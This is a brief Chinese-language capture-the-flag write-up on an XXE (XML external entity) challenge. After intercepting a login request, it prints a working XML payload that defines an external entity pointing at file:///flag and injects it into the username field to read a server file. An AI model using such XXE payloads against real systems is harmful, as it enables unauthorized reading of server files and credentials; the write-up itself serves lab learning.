前言
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
知识点
本题为XXE攻击,原理可以去看这篇文章https://www.freebuf.com/vuls/175451.html
题目
既然知道是XML,那我们抓个包看一下
可以看到user和passwd都是xml,那我们可以添加恶意实体试试
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
<!ENTITY abc SYSTEM "file:///flag">
]>
<user><username>&abc;</username><password>123456</password></user>
没想到直接就能利用了…